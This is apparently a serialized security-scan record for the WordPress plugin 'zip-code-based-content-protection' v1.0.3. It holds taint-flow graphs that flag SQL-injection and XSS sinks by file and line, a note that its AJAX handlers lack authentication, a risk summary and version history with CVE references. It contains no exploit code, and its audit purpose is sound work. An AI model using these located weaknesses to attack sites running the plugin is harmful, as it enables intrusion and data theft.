216,[],[],[],{"dangerousFunctions":301,"sqlUsage":302,"outputEscaping":308,"fileOperations":43,"externalRequests":13,"nonceChecks":11,"capabilityChecks":13,"bundledLibraries":358},[],{"prepared":303,"raw":43,"locations":304},29,[305],{"file":199,"line":306,"context":307},127,"$wpdb->get_var() with variable interpolation",{"escaped":309,"rawEcho":100,"locations":310},150,[311,315,316,318,320,322,324,326,328,330,332,334,336,338,341,342,344,346,348,349,351,354,356],{"file":312,"line":313,"context":314},"admin\\class-zipcode-bcp-admin.php",144,"raw output",{"file":312,"line":273,"context":314},{"file":312,"line":317,"context":314},224,{"file":312,"line":319,"context":314},235,{"file":312,"line":321,"context":314},247,{"file":312,"line":323,"context":314},259,{"file":312,"line":325,"context":314},271,{"file":312,"line":327,"context":314},321,{"file":312,"line":329,"context":314},332,{"file":312,"line":331,"context":314},344,{"file":312,"line":333,"context":314},356,{"file":312,"line":335,"context":314},392,{"file":312,"line":337,"context":314},403,{"file":339,"line":340,"context":314},"admin\\settings\\class-zipcode-bcp-admin-settings.php",180,{"file":265,"line":235,"context":314},{"file":265,"line":343,"context":314},230,{"file":265,"line":345,"context":314},242,{"file":265,"line":347,"context":314},254,{"file":265,"line":205,"context":314},{"file":265,"line":350,"context":314},370,{"file":352,"line":353,"context":314},"public\\partials\\zipcode-bcp-public-display.php",45,{"file":352,"line":355,"context":314},47,{"file":352,"line":357,"context":314},50,[359],{"name":360,"version":34,"knownCves":361},"Select2",[],[363,381,390,400,411,426,439,449,460],{"entryPoint":364,"graph":365,"unsanitizedCount":13,"severity":380},"zbcp_export_registered_users_in_zipcode (admin\\class-zipcode-bcp-admin.php:87)",{"nodes":366,"edges":378},[367,372],{"id":368,"type":369,"label":370,"file":312,"line":371},"n0","source","$_REQUEST",94,{"id":373,"type":374,"label":375,"file":312,"line":376,"wp_function":377},"n1","sink","get_results() [SQLi]",107,"get_results",[379],{"from":368,"to":373,"sanitized":290},"low",{"entryPoint":382,"graph":383,"unsanitizedCount":13,"severity":380},"zbcp_preview_registered_users_in_zipcode (admin\\class-zipcode-bcp-admin.php:121)",{"nodes":384,"edges":388},[385,386],{"id":368,"type":369,"label":370,"file":312,"line":306},{"id":373,"type":374,"label":375,"file":312,"line":387,"wp_function":377},139,[389],{"from":368,"to":373,"sanitized":290},{"entryPoint":391,"graph":392,"unsanitizedCount":13,"severity":380},"zbcp_view_posts_registered_users_in_zipcode (admin\\class-zipcode-bcp-admin.php:154)",{"nodes":393,"edges":398},[394,396],{"id":368,"type":369,"label":370,"file":312,"line":395},158,{"id":373,"type":374,"label":375,"file":312,"line":397,"wp_function":377},165,[399],{"from":368,"to":373,"sanitized":290},{"entryPoint":401,"graph":402,"unsanitizedCount":13,"severity":380},"zbcp_insert_zipcode_into_database (admin\\class-zipcode-bcp-admin.php:201)",{"nodes":403,"edges":409},[404,406],{"id":368,"type":369,"label":405,"file":312,"line":251},"$_POST",{"id":373,"type":374,"label":407,"file":312,"line":257,"wp_function":408},"get_var() [SQLi]","get_var",[410],{"from":368,"to":373,"sanitized":290},{"entryPoint":412,"graph":413,"unsanitizedCount":13,"severity":380},"\u003Cclass-zipcode-bcp-admin> (admin\\class-zipcode-bcp-admin.php:0)",{"nodes":414,"edges":423},[415,417,418,421],{"id":368,"type":369,"label":416,"file":312,"line":371},"$_REQUEST (x3)",{"id":373,"type":374,"label":375,"file":312,"line":376,"wp_function":377},{"id":419,"type":369,"label":420,"file":312,"line":251},"n2","$_POST (x2)",{"id":422,"type":374,"label":407,"file":312,"line":257,"wp_function":408},"n3",[424,425],{"from":368,"to":373,"sanitized":290},{"from":419,"to":422,"sanitized":290},{"entryPoint":427,"graph":428,"unsanitizedCount":13,"severity":380},"check_zipcode_from_post_page_meta (public\\class-zipcode-bcp-public.php:157)",{"nodes":429,"edges":436},[430,432,433,434],{"id":368,"type":369,"label":405,"file":265,"line":431},167,{"id":373,"type":374,"label":407,"file":265,"line":237,"wp_function":408},{"id":419,"type":369,"label":405,"file":265,"line":431},{"id":422,"type":374,"label":375,"file":265,"line":435,"wp_function":377},204,[437,438],{"from":368,"to":373,"sanitized":290},{"from":419,"to":422,"sanitized":290},{"entryPoint":440,"graph":441,"unsanitizedCount":13,"severity":380},"submit_email_against_zipcode (public\\class-zipcode-bcp-public.php:317)",{"nodes":442,"edges":447},[443,445],{"id":368,"type":369,"label":405,"file":265,"line":444},326,{"id":373,"type":374,"label":407,"file":265,"line":446,"wp_function":408},342,[448],{"from":368,"to":373,"sanitized":290},{"entryPoint":450,"graph":451,"unsanitizedCount":13,"severity":380},"\u003Cclass-zipcode-bcp-public> (public\\class-zipcode-bcp-public.php:0)",{"nodes":452,"edges":457},[453,454,455,456],{"id":368,"type":369,"label":420,"file":265,"line":431},{"id":373,"type":374,"label":407,"file":265,"line":237,"wp_function":408},{"id":419,"type":369,"label":405,"file":265,"line":431},{"id":422,"type":374,"label":375,"file":265,"line":435,"wp_function":377},[458,459],{"from":368,"to":373,"sanitized":290},{"from":419,"to":422,"sanitized":290},{"entryPoint":461,"graph":462,"unsanitizedCount":43,"severity":380},"\u003Czipcode-bcp-public-display> (public\\partials\\zipcode-bcp-public-display.php:0)",{"nodes":463,"edges":470},[464,467],{"id":368,"type":369,"label":465,"file":352,"line":466},"$_GET",16,{"id":373,"type":374,"label":468,"file":352,"line":353,"wp_function":469},"echo() [XSS]","echo",[471],{"from":368,"to":373,"sanitized":54},{"summary":473,"deductions":474},"The plugin 'zip-code-based-content-protection' v1.0.3 presents a mixed security posture. While it demonstrates good practices by heavily utilizing prepared statements for SQL queries (97%) and properly escaping a high percentage of output (87%), significant concerns arise from its attack surface. All 10 identified AJAX handlers lack authentication checks, making them prime targets for unauthorized actions. This, coupled with a complete absence of capability checks for any entry points, suggests a widespread potential for privilege escalation or unauthorized data manipulation.\n\nThe vulnerability history is also a red flag. Despite no currently unpatched CVEs, the plugin has a history of two known vulnerabilities, with one classified as high severity. The common vulnerability type being SQL Injection is particularly worrying, especially in light of the observed lack of authentication on AJAX handlers, which could be leveraged to exploit such weaknesses. The presence of a single unsanitized path flow in taint analysis, though not critical or high severity, further reinforces the need for caution. The plugin's reliance on bundled Select2, while common, could also pose a risk if the bundled version is outdated and contains known vulnerabilities.\n\nIn conclusion, the plugin shows some strengths in its handling of database queries and output sanitization. However, the lack of authentication and authorization on its entire AJAX attack surface, combined with its past vulnerability history, particularly for SQL injection, elevates the risk considerably. The absence of capability checks on any entry point is a critical oversight that requires immediate attention to secure the plugin effectively.",[475,477,479,481,483,486],{"reason":476,"points":11},"All AJAX handlers unprotected",{"reason":478,"points":11},"No capability checks",{"reason":480,"points":122},"1 unsanitized path flow",{"reason":482,"points":55},"Bundled library (Select2)",{"reason":484,"points":485},"History of 1 high severity CVE",15,{"reason":487,"points":11},"History of 1 medium severity CVE","2026-03-17T00:21:12.783Z",{"wat":490,"direct":501},{"assetPaths":491,"generatorPatterns":496,"scriptPaths":497,"versionParams":498},[492,493,494,495],"\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fcss\u002Fselect2.min.css","\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fcss\u002Fzipcode-bcp-admin.css","\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fjs\u002Fselect2.full.min.js","\u002Fwp-content\u002Fplugins\u002Fzip-code-based-content-protection\u002Fadmin\u002Fjs\u002Fzipcode-bcp-admin.js",[],[],[499,500],"zipcode-bcp-admin.css?ver=","zipcode-bcp-admin.js?ver=",{"cssClasses":502,"htmlComments":503,"htmlAttributes":504,"restEndpoints":506,"jsGlobals":507,"shortcodeOutput":509},[],[],[505],"data-plugin-name=\"zipcode-bcp\"",[],[508],"frontend_ajax_object",[],{"error":290,"url":511,"statusCode":512,"statusMessage":513,"message":513},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fzip-code-based-content-protection\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":55,"versions":515},[516,521,528],{"version":6,"download_url":22,"svn_tag_url":517,"released_at":34,"has_diff":54,"diff_files_changed":518,"diff_lines":34,"trac_diff_url":519,"vulnerabilities":520,"is_current":290},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fzip-code-based-content-protection\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.1&new_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.3",[],{"version":70,"download_url":522,"svn_tag_url":523,"released_at":34,"has_diff":54,"diff_files_changed":524,"diff_lines":34,"trac_diff_url":525,"vulnerabilities":526,"is_current":54},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzip-code-based-content-protection.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fzip-code-based-content-protection\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.0&new_path=%2Fzip-code-based-content-protection%2Ftags%2F1.0.1",[527],{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6},{"version":529,"download_url":530,"svn_tag_url":531,"released_at":34,"has_diff":54,"diff_files_changed":532,"diff_lines":34,"trac_diff_url":34,"vulnerabilities":533,"is_current":54},"1.0.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fzip-code-based-content-protection.1.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fzip-code-based-content-protection\u002Ftags\u002F1.0.0\u002F",[],[534,535],{"id":65,"url_slug":66,"title":67,"severity":71,"cvss_score":72,"vuln_type":39,"patched_in_version":70},{"id":30,"url_slug":31,"title":32,"severity":36,"cvss_score":37,"vuln_type":39,"patched_in_version":6}]